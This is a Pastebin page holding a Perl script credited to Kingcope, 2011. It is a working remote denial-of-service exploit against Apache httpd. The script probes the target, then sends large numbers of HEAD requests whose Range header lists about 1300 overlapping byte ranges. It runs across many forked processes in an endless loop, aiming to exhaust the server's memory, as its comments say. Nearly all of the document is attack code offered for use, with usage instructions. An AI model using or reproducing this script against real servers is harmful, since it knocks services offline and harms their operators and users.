Advertisement
Guest User

killapache_request-range

a guest
Aug 26th, 2011
329
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.83 KB | None | 0 0
  1. #Apache httpd Remote Denial of Service (memory exhaustion)
  2. #By Kingcope
  3. #Year 2011
  4. #
  5. # Will result in swapping memory to filesystem on the remote side
  6. # plus killing of processes when running out of swap space.
  7. # Remote System becomes unstable.
  8. #
  9.  
  10. use IO::Socket;
  11. use Parallel::ForkManager;
  12.  
  13. sub usage {
  14.     print "Apache Remote Denial of Service (memory exhaustion)\n";
  15.     print "by Kingcope\n";
  16.     print "usage: perl killapache.pl <host> [numforks]\n";
  17.     print "example: perl killapache.pl www.example.com 50\n";
  18. }
  19.  
  20. sub killapache {
  21. print "ATTACKING $ARGV[0] [using $numforks forks]\n";
  22.    
  23. $pm = new Parallel::ForkManager($numforks);
  24.  
  25. $|=1;
  26. srand(time());
  27. $p = "";
  28. for ($k=0;$k<1300;$k++) {
  29.     $p .= ",5-$k";
  30. }
  31.  
  32. for ($k=0;$k<$numforks;$k++) {
  33. my $pid = $pm->start and next;  
  34.    
  35. $x = "";
  36. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
  37.                                  PeerPort => "80",
  38.                                  Proto    => 'tcp');
  39.  
  40. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRequest-Range:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
  41. print $sock $p;
  42.  
  43. while(<$sock>) {
  44. }
  45.  $pm->finish;
  46. }
  47. $pm->wait_all_children;
  48. print ":pPpPpppPpPPppPpppPp\n";
  49. }
  50.  
  51. sub testapache {
  52. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
  53.                                  PeerPort => "80",
  54.                                  Proto    => 'tcp');
  55.  
  56. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRequest-Range:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
  57. print $sock $p;
  58.  
  59. $x = <$sock>;
  60. if ($x =~ /Partial/) {
  61.     print "host seems vuln\n";
  62.     return 1;  
  63. } else {
  64.     return 0;  
  65. }
  66. }
  67.  
  68. if ($#ARGV < 0) {
  69.     usage;
  70.     exit;  
  71. }
  72.  
  73. if ($#ARGV > 1) {
  74.     $numforks = $ARGV[1];
  75. } else {$numforks = 50;}
  76.  
  77. $v = testapache();
  78. if ($v == 0) {
  79.     print "Host does not seem vulnerable\n";
  80.     exit;  
  81. }
  82. while(1) {
  83. killapache();
  84. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement